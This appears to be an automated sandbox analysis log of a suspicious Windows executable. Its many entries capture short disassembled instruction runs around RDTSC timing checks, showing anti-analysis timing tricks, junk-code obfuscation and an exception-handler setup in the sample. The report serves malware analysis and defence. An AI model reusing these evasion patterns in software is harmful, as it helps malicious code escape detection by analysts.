Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2988 second address: 15C298C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C298C second address: 15C29AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F19CD112F6Eh 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F19CD112F66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C29AC second address: 15C29B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C29B0 second address: 15C29C6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F19CD112F6Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C29C6 second address: 15C29CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C29CA second address: 15C29CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2AEA second address: 15C2AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2C08 second address: 15C2C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F19CD112F66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F19CD112F73h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2C2A second address: 15C2C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2FE1 second address: 15C2FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C2FE8 second address: 15C301B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CCBA87CDh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F19CCBA87BAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C32E9 second address: 15C3301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CD112F72h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C3301 second address: 15C3305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C3305 second address: 15C330F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F19CD112F66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15B8105 second address: 15B8111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F19CCBA87B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15B8111 second address: 15B811F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158ABE3 second address: 158ABFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19CCBA87C1h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 158ABFA second address: 158ABFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C3B91 second address: 15C3B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C3E37 second address: 15C3E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C3E40 second address: 15C3E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C8923 second address: 15C892E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F19CD112F66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C892E second address: 15C8993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnc 00007F19CCBA87CAh 0x0000000f jmp 00007F19CCBA87C7h 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a jo 00007F19CCBA87CDh 0x00000020 jmp 00007F19CCBA87C7h 0x00000025 pop eax 0x00000026 mov eax, dword ptr [eax] 0x00000028 push ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C8993 second address: 15C8997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C8997 second address: 15C89A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C7002 second address: 15C7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C7006 second address: 15C700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C700A second address: 15C7010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15C7010 second address: 15C701A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CF903 second address: 15CF91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c jnc 00007F19CD112F68h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CF91B second address: 15CF91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CEE4F second address: 15CEE67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CD112F6Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F19CD112F66h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CEE67 second address: 15CEEB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F19CCBA87B8h 0x0000000f pushad 0x00000010 jo 00007F19CCBA87B6h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F19CCBA87C6h 0x00000028 jne 00007F19CCBA87B6h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CEEB3 second address: 15CEEB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CF5A0 second address: 15CF5AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F19CCBA87B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CF5AA second address: 15CF5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15CF730 second address: 15CF73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D08B6 second address: 15D08DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CD112F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F19CD112F6Ah 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F19CD112F66h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D0A59 second address: 15D0A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D0D29 second address: 15D0D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D0E12 second address: 15D0E18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D150F second address: 15D1548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], ebx 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F19CD112F68h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 xor dword ptr [ebp+122D28C5h], eax 0x00000027 nop 0x00000028 pushad 0x00000029 push eax 0x0000002a push eax 0x0000002b pop eax 0x0000002c pop eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D1548 second address: 15D155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F19CCBA87B6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D155B second address: 15D155F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D155F second address: 15D1565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D1709 second address: 15D1716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D1817 second address: 15D183A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D1A67 second address: 15D1A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D2980 second address: 15D299B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jl 00007F19CCBA87B6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D299B second address: 15D2A29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F19CD112F74h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F19CD112F68h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a xor si, 1A53h 0x0000002f mov dword ptr [ebp+122D19CCh], esi 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F19CD112F68h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 xor esi, 70B8A868h 0x00000057 or esi, dword ptr [ebp+122D28D0h] 0x0000005d xchg eax, ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F19CD112F6Fh 0x00000067 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D2A29 second address: 15D2A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19CCBA87BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D2A3B second address: 15D2A40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D2A40 second address: 15D2A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F19CCBA87BEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007F19CCBA87BEh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D46C6 second address: 15D4724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F19CD112F68h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+1247DDF2h], eax 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F19CD112F68h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 jmp 00007F19CD112F6Ch 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4724 second address: 15D474F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F19CCBA87B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F19CCBA87BBh 0x00000010 jmp 00007F19CCBA87BBh 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D474F second address: 15D4754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4754 second address: 15D475E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D523C second address: 15D5250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F19CD112F6Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4F98 second address: 15D4F9E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5250 second address: 15D5256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D4F9E second address: 15D4FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5256 second address: 15D525A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5AC4 second address: 15D5AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007F19CCBA87B6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D5AD8 second address: 15D5ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D6557 second address: 15D6572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F19CCBA87BDh 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D6572 second address: 15D6576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D72BC second address: 15D731B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007F19CCBA87BEh 0x00000010 push edi 0x00000011 ja 00007F19CCBA87B6h 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F19CCBA87B8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 xor esi, 0260B988h 0x0000003a push 00000000h 0x0000003c sub esi, dword ptr [ebp+122D1B8Ah] 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 jnl 00007F19CCBA87B6h 0x0000004b pop eax 0x0000004c jg 00007F19CCBA87BCh 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DA973 second address: 15DA977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DA977 second address: 15DA97D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DA97D second address: 15DA992 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F19CD112F70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7063 second address: 15D7071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7071 second address: 15D7076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DC92E second address: 15DC932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DC932 second address: 15DC938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7AD9 second address: 15D7ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DDAB6 second address: 15DDACB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jo 00007F19CD112F68h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15D7ADD second address: 15D7AE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DF9A2 second address: 15DF9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15E08A4 second address: 15E08AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F19CCBA87B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\95e1Fwp61u.exe RDTSC instruction interceptor: First address: 15DCA48 second address: 15DCAF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F19CD112F79h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F19CD112F68h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D3937h] 0x0000002f push dword ptr fs:[00000000h] 0x00000036 clc 0x00000037 jnp 00007F19CD112F6Ch 0x0000003d or ebx, 2D791D75h 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a mov bx, dx 0x0000004d mov eax, dword ptr [ebp+122D0EF5h] 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edx 0x00000058 call 00007F19CD112F68h 0x0000005d pop edx 0x0000005e mov dword ptr [esp+04h], edx 0x00000062 add dword ptr [esp+04h], 0000001Ah 0x0000006a inc edx 0x0000006b push edx 0x0000006c ret 0x0000006d pop edx 0x0000006e ret 0x0000006f xor ebx, dword ptr [ebp+122D18DFh] 0x00000075 js 00007F19CD112F6Ch 0x0000007b mov dword ptr [ebp+12457620h], edi 0x00000081 nop 0x00000082 jbe 00007F19CD112F6Eh 0x00000088 push ebx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
